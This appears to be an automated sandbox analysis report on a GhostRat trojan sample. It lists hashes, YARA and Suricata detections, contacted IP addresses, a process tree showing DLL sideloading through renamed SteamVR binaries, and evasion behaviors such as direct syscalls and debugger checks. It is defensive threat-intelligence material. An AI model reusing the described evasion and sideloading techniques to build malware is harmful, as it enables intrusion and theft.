Edit tour

Windows Analysis Report
#U6c47#U8054#U652f#U4ed8.exe

Overview

General Information

Sample name:	#U6c47#U8054#U652f#U4ed8.exe renamed because original name is a hash value
Original sample name:	.exe
Analysis ID:	1592740
MD5:	eabc234727934ad76f332e7cfb28c80b
SHA1:	c89d84a40075a2c53da3be5eb17e3fd95d6b7cc8
SHA256:	5e1d7275b0abd484c15f186690db73c42e861311da3f5f048563636336933b4a
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

GhostRat

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected GhostRat

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Reads the Security eventlog

Reads the System eventlog

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for available system drives (often done to infect USB drives)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to get notified if a device is plugged in / out

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a global mouse hook

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

PE file does not import any functions

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

#U6c47#U8054#U652f#U4ed8.exe (PID: 5892 cmdline: "C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe" MD5: EABC234727934AD76F332E7CFB28C80B)

APP.exe (PID: 5400 cmdline: "C:\Program Files\Weekplus\APP.exe" MD5: 53F534B5BE5BD54C0BBD6168C510776E)

WmiPrvSE.exe (PID: 1088 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

WerFault.exe (PID: 6416 cmdline: C:\Windows\system32\WerFault.exe -u -p 5892 -s 3584 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

GamePlusPlus.exe (PID: 5752 cmdline: "C:\Program Files\Weekplus\GamePlusPlus.exe" 1 MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 6448 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 6204 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 5708 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

WerFault.exe (PID: 1632 cmdline: C:\Windows\system32\WerFault.exe -u -p 5752 -s 1340 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

GamePlusPlus.exe (PID: 6308 cmdline: "C:\Program Files\Weekplus\GamePlusPlus.exe" 1 MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 828 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 2108 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 5136 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

WerFault.exe (PID: 6388 cmdline: C:\Windows\system32\WerFault.exe -u -p 6308 -s 1372 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

GamePlusPlus.exe (PID: 7072 cmdline: "C:\Program Files\Weekplus\GamePlusPlus.exe" 1 MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 1996 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 2724 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

GamePlusPlus.exe (PID: 2364 cmdline: vrdashboard.exe -duplication_gpu_check MD5: 8038EBB15EC202AD0A25564E55CDF32D)

WerFault.exe (PID: 2640 cmdline: C:\Windows\system32\WerFault.exe -u -p 7072 -s 1376 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x91ac7:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x13a07f:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x952ff:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB 0x13d8b7:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files\Weekplus\mpclient64.dat	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x3508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x6a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Program Files\Weekplus\mpclient.dat	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4bb08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4f03e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000016.00000002.3916971984.000002C1511F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000008.00000002.2915314802.000001B59AFF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4bb08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4f03e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000008.00000002.2915076303.000001B5996E8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x78f38:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x7c46e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000008.00000002.2915361128.000001B59B050000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000016.00000002.3916863440.000002C150E10000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4bb08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4f03e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000016.00000002.3916671618.000002C14F4A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x78ef8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x7c42e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000010.00000002.3326654982.00000115DA868000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x79018:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x7c54e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3969038874.0000000002E20000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x3508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x6a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000010.00000002.3327082496.00000115DC1B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000010.00000002.3326948864.00000115DC150000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4bb08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4f03e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.4040565455.000000001DF16000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x21258:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x2478e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: GamePlusPlus.exe PID: 5752	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: GamePlusPlus.exe PID: 6308	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: GamePlusPlus.exe PID: 7072	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe, ProcessId: 5892, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0z2nopvl.nk3.ps1

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T13:44:16.653417+0100	2803305	3	Unknown Traffic	192.168.2.5	49707	183.66.100.51	443	TCP
2025-01-16T13:44:18.893752+0100	2803305	3	Unknown Traffic	192.168.2.5	49709	183.66.100.51	443	TCP
2025-01-16T13:44:23.529058+0100	2803305	3	Unknown Traffic	192.168.2.5	49745	183.66.100.51	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: #U6c47#U8054#U652f#U4ed8.exe	Virustotal: Detection: 28%			Perma Link
Source: #U6c47#U8054#U652f#U4ed8.exe	ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.9% probability

Machine Learning detection for dropped file

Source: C:\Program Files\Weekplus\APP.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: #U6c47#U8054#U652f#U4ed8.exe

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 183.66.100.51:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.5:49706 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 183.66.100.45:443 -> 192.168.2.5:49727 version: TLS 1.0

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\GamePlusPlus.exe	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\mpclient.dat	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\openvr_api.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\mpclient64.dat	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\steam_api64.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\APP.exe	Jump to behavior

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\users\administrator\documents\visual studio 2010\Projects\LMNK\LMNK\obj\x64\Release\LMNK.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005481000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000000.2283294453.0000000000E42000.00000002.00000001.01000000.00000007.sdmp, APP.exe.0.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: XMM556.pdbP source: WER9203.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Windows\exe\XMM556.pdbect source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4108930101.0000000026D8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdb F source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4103958237.000000002291C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9203.tmp.dmp.7.dr
Source:	Binary string: C:\Users\user\Desktop\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.PDB source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.Native.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: XMM556.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Users\user\Desktop\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4107905878.0000000026D20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.Native.pdba$zzzdbg0 source: WER9203.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdbx\| source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4105919268.0000000022974000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.PDB_ source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\XMM556.pdb.pdb` source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\XMM556.pdb~ source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4108930101.0000000026D8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9203.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\XMM556.pdbh\ source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4107905878.0000000026D20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: &#U6c47#U8054#U652f#U4ed8.PDB@ source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: 0C:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.ni.pdbRSDS source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.pdbP source: WER9203.tmp.dmp.7.dr
Source:	Binary string: ".pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.pdb0 source: WER9203.tmp.dmp.7.dr
Source:	Binary string: indoC:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Core.pdb(H<1 source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER9203.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4106685460.00000000229AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: c:\buildslave\steamvr_rel_hotfix_win64\build\src\vrdashboard\Retail\win64\2017\vrdashboard.pdb source: GamePlusPlus.exe, 00000008.00000002.2915979575.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000008.00000000.2422580040.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000000.2424746992.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000002.2438005638.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000002.2440476207.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000000.2426709323.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000000.2427594527.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000002.2441404646.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000010.00000000.2993619999.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000010.00000002.3327812231.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000011.00000002.2999470304.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000011.00000000.2993923188.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000012.00000000.2994240888.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000012.00000002.3002375188.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000013.00000000.2994570807.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000013.00000002.3000662096.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000016.00000000.3593672695.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000016.00000002.3917476455.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000017.00000002.3606197237.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000017.00000000.3594128626.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000018.00000000.3594503284.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000018.00000002.3602723129.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000019.00000002.3607943696.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000019.00000000.3594920663.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe.0.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4107905878.0000000026D20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\buildslave\steamvr_rel_hotfix_win64\build\src\vrdashboard\Retail\win64\2017\vrdashboard.pdbF%% source: GamePlusPlus.exe, 00000008.00000002.2915979575.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000008.00000000.2422580040.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000000.2424746992.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000002.2438005638.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000002.2440476207.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000000.2426709323.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000000.2427594527.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000002.2441404646.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000010.00000000.2993619999.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000010.00000002.3327812231.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000011.00000002.2999470304.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000011.00000000.2993923188.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000012.00000000.2994240888.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000012.00000002.3002375188.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000013.00000000.2994570807.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000013.00000002.3000662096.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000016.00000000.3593672695.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000016.00000002.3917476455.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000017.00000002.3606197237.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000017.00000000.3594128626.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000018.00000000.3594503284.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000018.00000002.3602723129.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000019.00000002.3607943696.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000019.00000000.3594920663.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe.0.dr
Source:	Binary string: System.Core.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: Microsoft.Management.Infrastructure.Native.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe
Source:	Binary string: Microsoft.Management.Infrastructure.Native.ni.pdbRSDS source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: c:\buildslave\steam_rel_client_win64\build\src\steam_api\win64\Release\steam_api64.pdb source: GamePlusPlus.exe, 00000008.00000002.2916136051.00007FF89FDC8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000A.00000002.2438377410.00007FF89FDC8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000B.00000002.2441076000.00007FF89FDC8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000C.00000002.2447989776.00007FF89FDC8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000010.00000002.3328206103.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000011.00000002.3000557321.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000012.00000002.3002679207.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000013.00000002.3000970184.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000016.00000002.3917776709.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000017.00000002.3608099276.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000018.00000002.3603220709.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000019.00000002.3608644882.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, steam_api64.dll.0.dr
Source:	Binary string: C:\Windows\XMM556.pdbpdb556.pdb<V) source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4108930101.0000000026D8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9203.tmp.dmp.7.dr

Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: z:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: x:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: v:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: t:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: r:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: p:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: n:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: l:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: j:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: h:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: f:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: b:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: y:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: w:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: u:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: s:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: q:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: o:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: m:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: k:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: i:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: g:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: e:
Source: C:\Windows\System32\WerFault.exe	File opened: c:
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File opened: [:

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Code function: 8_2_00007FF78B874790 GetModuleFileNameA,_invalid_parameter_noinfo_noreturn,strstr,GetStdHandle,WriteFile,CloseHandle,strstr,strstr,VR_InitInternal2,VR_IsInterfaceVersionValid,VR_GetGenericInterface,VR_GetGenericInterface,VR_GetGenericInterface,VR_GetGenericInterface,VR_GetGenericInterface,LoadLibraryA,GetProcAddress,VR_GetGenericInterface,VRControlPanel,LoadIconA,LoadCursorA,GetStockObject,RegisterClassA,CreateWindowExA,RegisterDeviceNotificationA,RegisterRawInputDevices,PeekMessageA,TranslateMessage,DispatchMessageA,PeekMessageA,VR_GetGenericInterface,UnregisterDeviceNotification,VR_ShutdownInternal,VR_ShutdownInternal,VR_GetVRInitErrorAsSymbol,_invalid_parameter_noinfo_noreturn,

8_2_00007FF78B874790

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B916A480 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,	0_2_00007FF8B916A480
